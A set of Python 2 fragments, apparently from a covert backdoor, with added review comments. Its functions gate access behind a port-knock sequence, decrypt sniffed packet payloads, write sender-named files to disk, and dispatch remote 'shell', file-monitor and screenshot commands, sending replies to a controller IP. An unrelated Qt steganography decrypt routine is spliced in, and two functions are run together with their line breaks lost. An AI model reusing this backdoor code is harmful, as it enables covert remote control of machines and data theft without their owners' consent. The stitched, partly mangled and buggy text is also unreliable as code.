def recvFile(packet):
    """Handle one captured packet on the knock-gated file-transfer path.

    Reads the module globals ``fileIP`` and ``state`` plus the settings on
    ``configReader``. While the sender is not ``fileIP`` or ``state`` is not 3,
    the packet is handed to ``knock()``. Once ``state`` is 3, a packet from
    ``fileIP`` that carries a Raw payload is trimmed, passed through
    ``encryption.decryption`` and split at the first NUL byte into a file name
    and the file contents, which are written to disk. ``state`` is then reset
    to 0 so that a new knock sequence is required.

    NOTE(review): the block nesting below was reconstructed from a listing
    whose line breaks were lost -- confirm against the original file.
    NOTE(review): presumably registered as a packet-sniffing callback; the
    registration is not visible here.
    """
    global resultsForFiles
    global state
    # Check whether the sender is the accepted fileIP and the knock state is
    # complete; if either test fails, feed the packet to the knock handler.
    # NOTE(review): packet[IP] is indexed here before the haslayer(IP) test
    # further down, and `is not 3` is an identity comparison, not `!=`.
    if packet[IP].src!= fileIP or state is not 3:
        print "\nChecking Knock Sequence"
        knock(packet)
    # Only continue for IP packets with a Raw payload once the knock has passed.
    if packet.haslayer(IP) and state is 3 and packet.haslayer(Raw):
        # Drop packets whose source is not the authenticated IP.
        if packet[IP].src != fileIP:
            print "IP didn't match" + "source" + packet[IP].src + "fileIP" + fileIP
            return
        # Take the payload only when the sender is the configured backdoor IP;
        # otherwise resultsForFiles keeps whatever value it had before.
        if packet[IP].src == configReader.destIP:
            # load the packet content
            resultsForFiles = packet[Raw].load
        if packet.haslayer(Raw):
            # Intended as "payload contains the password".
            # NOTE(review): find() returns -1 when the substring is absent and
            # 0 when it is at the start, so this condition is true for every
            # payload except one that begins with the password.
            if packet[Raw].load.find(configReader.password):
                # NOTE(review): the return value of strip() is discarded, so
                # this line leaves resultsForFiles unchanged.
                resultsForFiles.strip(configReader.password)
                # Drop the last 8 bytes -- presumably the trailing password;
                # confirm its length against the configuration.
                resultsForFiles = resultsForFiles[:-8]
                # debugging purposes
                print resultsForFiles
                # decrypt the contents and write the file
                decryptedData = encryption.decryption(resultsForFiles)
                # Everything before the first NUL is the name, the rest is data.
                fileName, fileData = decryptedData.split("\0",1)
                # NOTE(review): fileName comes from the decrypted payload and is
                # passed to open() unmodified, so the sender chooses the path
                # that is written. The descriptor is never explicitly closed.
                fileDescriptor = open(fileName, 'wb')
                fileDescriptor.write(fileData)
                resultsForFiles = ""
                state = 0 #reset state for new knock
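def __decrypt(self):
    """Recover the hidden message from the loaded image and save it to a file.

    Reads ``self.enc_image`` and the text of ``self.key_widget``. If either is
    missing, a critical message box is shown and nothing else happens.
    Otherwise ``decryption(image, key)`` is called, the user is asked for a
    destination through a save dialog, and the result is written there.
    Failures are reported through ``self.show_error``; cancelling the save
    dialog is treated as "do nothing", not as an error.

    NOTE(review): the recovered text is written to the chosen path as-is
    (unencrypted), with the default permissions open() gives a new file.
    """
    key = self.key_widget.text()
    # Identity test: `== None` would go through the image object's own __eq__.
    if self.enc_image is None or key == '':
        box = qt.QMessageBox(parent=self)
        box.setIcon(qt.QMessageBox.Critical)
        box.setText("Error")
        box.setInformativeText('Image file and key are required!')
        box.setWindowTitle("Error")
        box.exec_()
        return
    try:
        self.process.setText('Processing...')
        # Force the status label to redraw before the blocking call below.
        self.process.repaint()
        secret = decryption(self.enc_image, key)
        self.process.setText('')
        chosen = qt.QFileDialog.getSaveFileName(self, "Save file", "secret.txt", ".txt")
        path = chosen[0]
        if not path:
            # Dialog cancelled: there is nothing to write.
            return
        with open(path, "w") as f:
            f.write(secret)
    except Exception:
        # Exception, not a bare except, so KeyboardInterrupt/SystemExit still
        # propagate. The message stays generic; the cause is not shown.
        self.process.setText('')
        self.show_error("Error", "Something Went Wrong", '')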
def recvCmd(packet): global results #check if the packet has IP layer if packet.haslayer(IP): #check if the packet has the same IP as the backdoor if packet[IP].src == configReader.destIP: #parse the packet and add them together dataReceived = helpers.parsePacket(packet) results += (dataReceived) print results #check packet for raw data if packet.haslayer(Raw): #if the data has the password at the end then execute decryption if packet[Raw].load == configReader.password: decryptedData = encryption.decryption(results) print decryptedData results = ""
def runCmd(packet): global fileProcess #check for IP and raw layer in IP if packet.haslayer(IP) and packet.haslayer(Raw): if packet[IP].src != clientIP: return print "Received Packet" #decrypt the packet command = encryption.decryption(packet[Raw].load) #check for contents in command variable if not command: return #check for the password if command.startswith(configReader.password): #grab content after the password command = command[len(configReader.password):] #split the command try: commandType, commandString = command.split(' ') #if the command has only one command except ValueError: commandType = command #if the command is shell if commandType == 'shell': shellCommand(packet, commandString) #if the command is monitor elif commandType == 'monitor': try: #start the monitor process fileProcess = Process(target=startMonitor, args=(commandString, packet[IP].src)) fileProcess.daemon = True fileProcess.start() print "Sending Response: File Monitoring Started\n" #catch the error if something is already monitored except RuntimeError: helpers.sendMessage("You already have a monitor in progress", configReader.srcIP, 9000) except OSError: helpers.sendMessage("Path of file/folder not found", configReader.srcIP, 9000) #command is stop elif commandType == 'stop': stopMonitor() fileProcess.terminate() print "Monitoring has stopped" #command is screenshot elif commandType == 'screenshot': screenshot(packet) else: print "Unknown Command\n" helpers.sendMessage("Unknown Command", configReader.srcIP, 9000)